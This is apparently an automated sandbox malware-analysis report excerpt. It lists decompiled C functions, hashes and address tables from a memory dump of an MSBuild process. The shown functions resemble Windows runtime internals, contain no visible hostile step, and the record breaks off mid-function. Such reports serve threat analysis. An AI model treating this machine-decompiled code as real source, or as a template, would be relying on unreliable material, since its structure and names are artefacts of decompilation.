                                            0x01086c21
                                            0x01086c28
                                            0x01086c3a
                                            0x01086c2a
                                            0x01086c33
                                            0x01086c33
                                            0x01086c3f
                                            0x01086c48
                                            0x01086c4d
                                            0x01086c60
                                            0x01086c65
                                            0x01086c69
                                            0x01086c73
                                            0x01086c79
                                            0x01086c7f
                                            0x01086c86
                                            0x01086c90
                                            0x01086c94
                                            0x01086ca6
                                            0x01086cb2
                                            0x01086cbd
                                            0x01086cbd
                                            0x01086cc3
                                            0x01086cc7
                                            0x01086ccb
                                            0x01086cd0
                                            0x01086cd1
                                            0x01086ce2
                                            0x01086ce2
                                            0x01086c69
                                            0x01086ced

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7791a1d37e3450316945e624b3d5bec8551e49a837641dd904a09dccb41bfdec
                                            • Instruction ID: 2956dd1230c1b2642755183b4587c2eaed5733a32e880b5494aeb2670f1b4c80
                                            • Opcode Fuzzy Hash: 7791a1d37e3450316945e624b3d5bec8551e49a837641dd904a09dccb41bfdec
                                            • Instruction Fuzzy Hash: 3421ADB1A00659AFD711EB68D980F6AB7B8FF58700F0440A9FA84C7B90D635ED10CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E010490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                            				intOrPtr* _v0;
                                            				void* _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				char _v36;
                                            				void* _t38;
                                            				intOrPtr _t41;
                                            				void* _t44;
                                            				signed int _t45;
                                            				intOrPtr* _t49;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				intOrPtr* _t59;
                                            				void* _t62;
                                            				void* _t63;
                                            				void* _t65;
                                            				void* _t66;
                                            				signed int _t69;
                                            				intOrPtr* _t70;
                                            				void* _t71;
                                            				intOrPtr* _t72;
                                            				intOrPtr* _t73;
                                            				char _t74;
                                            
                                            				_t65 = __edx;
                                            				_t57 = _a4;
                                            				_t32 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t32 + 0x14c; // 0x14c
                                            				_t70 = _t3;
                                            				_v16 = __ecx;
                                            				_t72 =  *_t70;
                                            				while(_t72 != _t70) {
                                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                            						L24:
                                            						_t72 =  *_t72;
                                            						continue;
                                            					}
                                            					_t30 = _t72 + 0x10; // 0x10
                                            					if(E0105D4F0(_t30, _t65, _t57) == _t57) {
                                            						return 0xb7;
                                            					}
                                            					_t65 = _v8;
                                            					goto L24;
                                            				}
                                            				_t61 = _t57;
                                            				_push( &_v12);
                                            				_t66 = 0x10;
                                            				if(E0103E5E0(_t57, _t66) < 0) {
                                            					return 0x216;
                                            				}
                                            				_t73 = L01024620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                            				if(_t73 == 0) {
                                            					_t38 = 0xe;
                                            					return _t38;
                                            				}
                                            				_t9 = _t73 + 0x10; // 0x10
                                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                            				E0104F3E0(_t9, _v8, _t57);
                                            				_t41 =  *_t70;
                                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                            					_t62 = 3;
                                            					asm("int 0x29");
                                            					_push(_t62);
                                            					_push(_t57);
                                            					_push(_t73);
                                            					_push(_t70);
                                            					_t71 = _t62;
                                            					_t74 = 0;
                                            					_v36 = 0;
                                            					_t63 = E0103A2F0(_t62, _t71, 1, 6,  &_v36);
                                            					if(_t63 == 0) {
                                            						L20:
                                            						_t44 = 0x57;
                                            						return _t44;
                                            					}
                                            					_t45 = _v12;
                                            					_t58 = 0x1c;
                                            					if(_t45 < _t58) {
                                            						goto L20;
                                            					}
                                            					_t69 = _t45 / _t58;
                                            					if(_t69 == 0) {
                                            						L19:
                                            						return 0xe8;
                                            					}
                                            					_t59 = _v0;
                                            					do {
                                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                            							goto L18;
                                            						}
                                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                            						 *_t59 = _t49;
                                            						if( *_t49 != 0x53445352) {
                                            							goto L18;
                                            						}
                                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                            						return 0;
                                            						L18:
                                            						_t63 = _t63 + 0x1c;
                                            						_t74 = _t74 + 1;
                                            					} while (_t74 < _t69);
                                            					goto L19;
                                            				}
                                            				 *_t73 = _t41;
                                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                            				 *_t70 = _t73;
                                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                            				return 0;
                                            			}


























                                            0x010490af
                                            0x010490b8
                                            0x010490bb
                                            0x010490bf
                                            0x010490c2
                                            0x010490c2
                                            0x010490c8
                                            0x010490cb
                                            0x010490cd
                                            0x010814d7
                                            0x010814eb
                                            0x010814eb
                                            0x00000000
                                            0x010814eb
                                            0x010814db
                                            0x010814e6
                                            0x00000000
                                            0x010814f2
                                            0x010814e8
                                            0x00000000
                                            0x010814e8
                                            0x010490d8
                                            0x010490da
                                            0x010490dd
                                            0x010490e5
                                            0x00000000
                                            0x01049139
                                            0x010490fa
                                            0x010490fe
                                            0x01049142
                                            0x00000000
                                            0x01049142
                                            0x01049104
                                            0x01049107
                                            0x0104910b
                                            0x01049110
                                            0x01049118
                                            0x01049147
                                            0x01049148
                                            0x0104914f
                                            0x01049150
                                            0x01049151
                                            0x01049152
                                            0x01049156
                                            0x0104915d
                                            0x01049160
                                            0x01049168
                                            0x0104916c
                                            0x010491bc
                                            0x010491be
                                            0x00000000
                                            0x010491be
                                            0x0104916e
                                            0x01049173
                                            0x01049176
                                            0x00000000
                                            0x00000000
                                            0x0104917c
                                            0x01049180
                                            0x010491b5
                                            0x00000000
                                            0x010491b5
                                            0x01049182
                                            0x01049185
                                            0x01049189
                                            0x00000000
                                            0x00000000
                                            0x0104918e
                                            0x01049190
                                            0x01049198
                                            0x00000000
                                            0x00000000
                                            0x010491a0
                                            0x00000000
                                            0x010491ad
                                            0x010491ad
                                            0x010491b0
                                            0x010491b1
                                            0x00000000
                                            0x01049185
                                            0x0104911a
                                            0x0104911c
                                            0x0104911f
                                            0x01049125
                                            0x01049127
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction ID: 52edd264844b2fb33920d39598dfd719ba7e68d2c70cfd259e946dd4e6f56f39
                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                            • Instruction Fuzzy Hash: 1C2183B1A00205EFDB21DF59C484AAAFBF8EF58314F14847AE9C597210D730ED40CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E01033B7A(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				intOrPtr _v20;
                                            				intOrPtr _t17;
                                            				intOrPtr _t26;
                                            				void* _t35;
                                            				void* _t38;
                                            				void* _t41;
                                            				intOrPtr _t44;
                                            
                                            				_t17 =  *0x10f84c4; // 0x0
                                            				_v12 = 1;
                                            				_v8 =  *0x10f84c0 * 0x4c;
                                            				_t41 = __ecx;
                                            				_t35 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10f84c0 * 0x4c);
                                            				if(_t35 == 0) {
                                            					_t44 = 0xc0000017;
                                            				} else {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t35);
                                            					_push(4);
                                            					_push( &_v12);
                                            					_push(0x6b);
                                            					_t44 = E0104AA90();
                                            					_v20 = _t44;
                                            					if(_t44 >= 0) {
                                            						E0104FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10f84c0 * 0xc);
                                            						_t38 = _t35;
                                            						if(_t35 < _v8 + _t35) {
                                            							do {
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                            							} while (_t38 < _v8 + _t35);
                                            							_t44 = _v20;
                                            						}
                                            					}
                                            					_t26 =  *0x10f84c4; // 0x0
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                            				}
                                            				return _t44;
                                            			}












                                            0x01033b89
                                            0x01033b96
                                            0x01033ba1
                                            0x01033bab
                                            0x01033bb5
                                            0x01033bb9
                                            0x01076298
                                            0x01033bbf
                                            0x01033bc2
                                            0x01033bc3
                                            0x01033bc9
                                            0x01033bca
                                            0x01033bcc
                                            0x01033bcd
                                            0x01033bd4
                                            0x01033bd6
                                            0x01033bdb
                                            0x01033bea
                                            0x01033bf7
                                            0x01033bfb
                                            0x01033bff
                                            0x01033c09
                                            0x01033c0a
                                            0x01033c0b
                                            0x01033c0f
                                            0x01033c14
                                            0x01033c18
                                            0x01033c18
                                            0x01033bfb
                                            0x01033c1b
                                            0x01033c30
                                            0x01033c30
                                            0x01033c3d

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acec9d8f5410bae490c17cd4a10e517f5934276116ed99f6edc93e6b5bf5ae45
                                            • Instruction ID: 072ef1b4ce469c153fa5262ec6ebeacad9188e73c7687ee00ea5289dde2d6964
                                            • Opcode Fuzzy Hash: acec9d8f5410bae490c17cd4a10e517f5934276116ed99f6edc93e6b5bf5ae45
                                            • Instruction Fuzzy Hash: 7621CFB2A00109AFDB10DF58CD81B9ABBBDFB44308F154069EA49AB252C776ED11CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E01086CF0(void* __edx, intOrPtr _a4, short _a8) {
                                            				char _v8;
                                            				char _v12;
                                            				char _v16;
                                            				char _v20;
                                            				char _v28;
                                            				char _v36;
                                            				char _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed char* _t21;
                                            				void* _t24;
                                            				void* _t36;
                                            				void* _t38;
                                            				void* _t46;
                                            
                                            				_push(_t36);
                                            				_t46 = __edx;
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0384;
                                            				} else {
                                            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                            				}
                                            				if( *_t21 != 0) {
                                            					_t21 =  *[fs:0x30];
                                            					if((_t21[0x240] & 0x00000004) != 0) {
                                            						if(E01027D50() == 0) {
                                            							_t21 = 0x7ffe0385;
                                            						} else {
                                            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                            						}
                                            						if(( *_t21 & 0x00000020) != 0) {
                                            							_t56 = _t46;
                                            							if(_t46 == 0) {
                                            								_t46 = 0xfe5c80;
                                            							}
                                            							_push(_t46);
                                            							_push( &_v12);
                                            							_t24 = E0103F6E0(_t36, 0, _t46, _t56);
                                            							_push(_a4);
                                            							_t38 = _t24;
                                            							_push( &_v28);
                                            							_t21 = E0103F6E0(_t38, 0, _t46, _t56);
                                            							if(_t38 != 0) {
                                            								if(_t21 != 0) {
                                            									E01087016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                            									L01022400( &_v52);
                                            								}
                                            								_t21 = L01022400( &_v28);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t21;
                                            			}



















                                            0x01086cfb
                                            0x01086d00
                                            0x01086d02
                                            0x01086d06
                                            0x01086d0a
                                            0x01086d0e
                                            0x01086d19
                                            0x01086d2b
                                            0x01086d1b
                                            0x01086d24
                                            0x01086d24
                                            0x01086d33
                                            0x01086d39
                                            0x01086d46
                                            0x01086d4f
                                            0x01086d61
                                            0x01086d51
                                            0x01086d5a
                                            0x01086d5a
                                            0x01086d69
                                            0x01086d6b
                                            0x01086d6d
                                            0x01086d6f
                                            0x01086d6f
                                            0x01086d74
                                            0x01086d79
                                            0x01086d7a
                                            0x01086d7f
                                            0x01086d82
                                            0x01086d88
                                            0x01086d89
                                            0x01086d90
                                            0x01086d94
                                            0x01086da7
                                            0x01086db1
                                            0x01086db1
                                            0x01086dbb
                                            0x01086dbb
                                            0x01086d90
                                            0x01086d69
                                            0x01086d46
                                            0x01086dc6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f849aeaf932d6e7130c6b5b61b152bcf5f26344faeda80d3cb53a92e6ffea76a
                                            • Instruction ID: 2cfdfb69de803a36575213ccdc141235924aafe6c33507f13917d7c2045f1018
                                            • Opcode Fuzzy Hash: f849aeaf932d6e7130c6b5b61b152bcf5f26344faeda80d3cb53a92e6ffea76a
                                            • Instruction Fuzzy Hash: 7721F5729087459BD311FF69C944FABBBECAFA1740F050496FAC0C7261EB35D548C6A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E010D070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				char _v8;
                                            				intOrPtr _v11;
                                            				signed int _v12;
                                            				intOrPtr _v15;
                                            				signed int _v16;
                                            				intOrPtr _v28;
                                            				void* __ebx;
                                            				char* _t32;
                                            				signed int* _t38;
                                            				signed int _t60;
                                            
                                            				_t38 = __ecx;
                                            				_v16 = __edx;
                                            				_t60 = E010D07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                            				if(_t60 != 0) {
                                            					_t7 = _t38 + 0x38; // 0x29cd5903
                                            					_push( *_t7);
                                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                                            					_push( *_t9);
                                            					_v12 = _a8 << 0xc;
                                            					_t11 = _t38 + 4; // 0x5de58b5b
                                            					_push(0x4000);
                                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                            					E010CAFDE( &_v8,  &_v12);
                                            					E010D1293(_t38, _v28, _t60);
                                            					if(E01027D50() == 0) {
                                            						_t32 = 0x7ffe0380;
                                            					} else {
                                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                            						E010C14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                            					}
                                            				}
                                            				return  ~_t60;
                                            			}













                                            0x010d071b
                                            0x010d0724
                                            0x010d0734
                                            0x010d0738
                                            0x010d074b
                                            0x010d074b
                                            0x010d0753
                                            0x010d0753
                                            0x010d0759
                                            0x010d075d
                                            0x010d0774
                                            0x010d0779
                                            0x010d077d
                                            0x010d0789
                                            0x010d0795
                                            0x010d07a7
                                            0x010d0797
                                            0x010d07a0
                                            0x010d07a0
                                            0x010d07af
                                            0x010d07c4
                                            0x010d07cd
                                            0x010d07cd
                                            0x010d07af
                                            0x010d07dc

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction ID: 40412c53b588fda5c357dce8952da86966d1cfc04cb27ac22e1f43d6e27a14aa
                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                            • Instruction Fuzzy Hash: C521DE36604304AFD705DF68C880AAABBE5FFD4650F048669F9998B385DA30D909CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E01087794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _t21;
                                            				void* _t24;
                                            				intOrPtr _t25;
                                            				void* _t36;
                                            				short _t39;
                                            				signed char* _t42;
                                            				unsigned int _t46;
                                            				void* _t50;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t21 =  *0x10f7b9c; // 0x0
                                            				_t46 = _a8;
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				_t4 = _t46 + 0x2e; // 0x2e
                                            				_t36 = _t4;
                                            				_t24 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                            				_t50 = _t24;
                                            				if(_t50 != 0) {
                                            					_t25 = _a4;
                                            					if(_t25 == 5) {
                                            						L3:
                                            						_t39 = 0x14b1;
                                            					} else {
                                            						_t39 = 0x14b0;
                                            						if(_t25 == 6) {
                                            							goto L3;
                                            						}
                                            					}
                                            					 *((short*)(_t50 + 6)) = _t39;
                                            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                            					_t11 = _t50 + 0x2c; // 0x2c
                                            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                            					E0104F3E0(_t11, _a12, _t46);
                                            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                            					if(E01027D50() == 0) {
                                            						_t42 = 0x7ffe0384;
                                            					} else {
                                            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					_push(_t50);
                                            					_t19 = _t36 - 0x20; // 0xe
                                            					_push(0x403);
                                            					_push( *_t42 & 0x000000ff);
                                            					E01049AE0();
                                            					_t24 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                            				}
                                            				return _t24;
                                            			}













                                            0x01087799
                                            0x0108779a
                                            0x0108779b
                                            0x010877a3
                                            0x010877ab
                                            0x010877ae
                                            0x010877b1
                                            0x010877b1
                                            0x010877bf
                                            0x010877c4
                                            0x010877c8
                                            0x010877ce
                                            0x010877d4
                                            0x010877e0
                                            0x010877e0
                                            0x010877d6
                                            0x010877d6
                                            0x010877de
                                            0x00000000
                                            0x00000000
                                            0x010877de
                                            0x010877e5
                                            0x010877f0
                                            0x010877f3
                                            0x010877f6
                                            0x010877fd
                                            0x01087800
                                            0x0108780c
                                            0x01087818
                                            0x0108782b
                                            0x0108781a
                                            0x01087823
                                            0x01087823
                                            0x01087830
                                            0x01087831
                                            0x01087838
                                            0x0108783d
                                            0x0108783e
                                            0x0108784f
                                            0x0108784f
                                            0x0108785a

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03ec2f69f7bd983c9df3f7207ac52981b32da6903dc638cb014ec2c36fa645ce
                                            • Instruction ID: 233429c9a54382e8060ba8d648b3e3c394325ee057ec14d73f4c0ace19da9ddd
                                            • Opcode Fuzzy Hash: 03ec2f69f7bd983c9df3f7207ac52981b32da6903dc638cb014ec2c36fa645ce
                                            • Instruction Fuzzy Hash: 9C219F72504604EBC725EF69D880EABBBB8FF48740F10456DE68AC7750D634E900CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E0102AE73(intOrPtr __ecx, void* __edx) {
                                            				intOrPtr _v8;
                                            				void* _t19;
                                            				char* _t22;
                                            				signed char* _t24;
                                            				intOrPtr _t25;
                                            				intOrPtr _t27;
                                            				void* _t31;
                                            				intOrPtr _t36;
                                            				char* _t38;
                                            				signed char* _t42;
                                            
                                            				_push(__ecx);
                                            				_t31 = __edx;
                                            				_v8 = __ecx;
                                            				_t19 = E01027D50();
                                            				_t38 = 0x7ffe0384;
                                            				if(_t19 != 0) {
                                            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				} else {
                                            					_t22 = 0x7ffe0384;
                                            				}
                                            				_t42 = 0x7ffe0385;
                                            				if( *_t22 != 0) {
                                            					if(E01027D50() == 0) {
                                            						_t24 = 0x7ffe0385;
                                            					} else {
                                            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            					}
                                            					if(( *_t24 & 0x00000010) != 0) {
                                            						goto L17;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					_t27 = E01027D50();
                                            					if(_t27 != 0) {
                                            						_t27 =  *[fs:0x30];
                                            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                            					}
                                            					if( *_t38 != 0) {
                                            						_t27 =  *[fs:0x30];
                                            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                            							goto L5;
                                            						}
                                            						_t27 = E01027D50();
                                            						if(_t27 != 0) {
                                            							_t27 =  *[fs:0x30];
                                            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                            						}
                                            						if(( *_t42 & 0x00000020) != 0) {
                                            							L17:
                                            							_t25 = _v8;
                                            							_t36 = 0;
                                            							if(_t25 != 0) {
                                            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                            							}
                                            							_t27 = E01087794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                            						}
                                            						goto L5;
                                            					} else {
                                            						L5:
                                            						return _t27;
                                            					}
                                            				}
                                            			}













                                            0x0102ae78
                                            0x0102ae7c
                                            0x0102ae7e
                                            0x0102ae81
                                            0x0102ae86
                                            0x0102ae8d
                                            0x01072691
                                            0x0102ae93
                                            0x0102ae93
                                            0x0102ae93
                                            0x0102ae98
                                            0x0102ae9d
                                            0x010726a2
                                            0x010726b4
                                            0x010726a4
                                            0x010726ad
                                            0x010726ad
                                            0x010726b9
                                            0x00000000
                                            0x010726bb
                                            0x00000000
                                            0x010726bb
                                            0x0102aea3
                                            0x0102aea3
                                            0x0102aea3
                                            0x0102aeaa
                                            0x010726c0
                                            0x010726c9
                                            0x010726c9
                                            0x0102aeb3
                                            0x010726d4
                                            0x010726e1
                                            0x00000000
                                            0x00000000
                                            0x010726e7
                                            0x010726ee
                                            0x010726f0
                                            0x010726f9
                                            0x010726f9
                                            0x01072702
                                            0x01072708
                                            0x01072708
                                            0x0107270b
                                            0x0107270f
                                            0x01072711
                                            0x01072711
                                            0x01072725
                                            0x01072725
                                            0x00000000
                                            0x0102aeb9
                                            0x0102aeb9
                                            0x0102aebf
                                            0x0102aebf
                                            0x0102aeb3

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                            • Instruction ID: c6d7a586963dcc56504ab287397d58ec62b945ae460813237cc480b70d508b66
                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                            • Instruction Fuzzy Hash: 2F21F672B01691DFEB26AB2CC944B657BE8FF54740F1900E1DD848B792EB34DC41C6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0103FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				void* _t19;
                                            				intOrPtr _t29;
                                            				intOrPtr _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t37;
                                            				intOrPtr* _t40;
                                            
                                            				_t35 = __edx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t37 = 0;
                                            				_v8 = __edx;
                                            				_t29 = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                            					L3:
                                            					_t19 = _a4 - 4;
                                            					if(_t19 != 0) {
                                            						if(_t19 != 1) {
                                            							L7:
                                            							return _t37;
                                            						}
                                            						if(_t35 == 0) {
                                            							L11:
                                            							_t37 = 0xc000000d;
                                            							goto L7;
                                            						}
                                            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                            							_t35 = _v8;
                                            						}
                                            						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                            						goto L7;
                                            					}
                                            					if(_t29 == 0) {
                                            						goto L11;
                                            					}
                                            					_t32 =  *_t40;
                                            					if(_t32 != 0) {
                                            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                            						E010176E2( *_t40);
                                            					}
                                            					 *_t40 = _t29;
                                            					goto L7;
                                            				}
                                            				_t40 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                            				if(_t40 == 0) {
                                            					_t37 = 0xc0000017;
                                            					goto L7;
                                            				}
                                            				_t35 = _v8;
                                            				 *_t40 = 0;
                                            				 *((intOrPtr*)(_t40 + 4)) = 0;
                                            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                            				goto L3;
                                            			}










                                            0x0103fd9b
                                            0x0103fda0
                                            0x0103fda1
                                            0x0103fdab
                                            0x0103fdad
                                            0x0103fdb0
                                            0x0103fdb8
                                            0x0103fe0f
                                            0x0103fde6
                                            0x0103fde9
                                            0x0103fdec
                                            0x0107c0c0
                                            0x0103fdfe
                                            0x0103fe06
                                            0x0103fe06
                                            0x0107c0c8
                                            0x0103fe2d
                                            0x0103fe2d
                                            0x00000000
                                            0x0103fe2d
                                            0x0107c0d1
                                            0x0107c0e0
                                            0x0107c0e5
                                            0x0107c0e5
                                            0x0107c0e8
                                            0x00000000
                                            0x0107c0e8
                                            0x0103fdf4
                                            0x00000000
                                            0x00000000
                                            0x0103fdf6
                                            0x0103fdfa
                                            0x0103fe1a
                                            0x0103fe1f
                                            0x0103fe1f
                                            0x0103fdfc
                                            0x00000000
                                            0x0103fdfc
                                            0x0103fdcc
                                            0x0103fdd0
                                            0x0103fe26
                                            0x00000000
                                            0x0103fe26
                                            0x0103fdd8
                                            0x0103fddb
                                            0x0103fddd
                                            0x0103fde0
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                            • Instruction ID: 954f9f27e0d7c378fe8cf0d9e14c4950688c064a813c431b9e5b79d9df9837f6
                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                            • Instruction Fuzzy Hash: E3217C72A00642DFD731DF4DC648A66B7E9EBD4B10F2485AEE98687611D7349C00CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E0103B390(void* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				signed char _t12;
                                            				signed int _t16;
                                            				signed int _t21;
                                            				void* _t28;
                                            				signed int _t30;
                                            				signed int _t36;
                                            				signed int _t41;
                                            
                                            				_push(__ecx);
                                            				_t41 = _a4 + 0xffffffb8;
                                            				E01022280(_t12, 0x10f8608);
                                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                            				asm("sbb edi, edi");
                                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                            				_v8 = _t36;
                                            				asm("lock cmpxchg [ebx], ecx");
                                            				_t30 = 1;
                                            				if(1 != 1) {
                                            					while(1) {
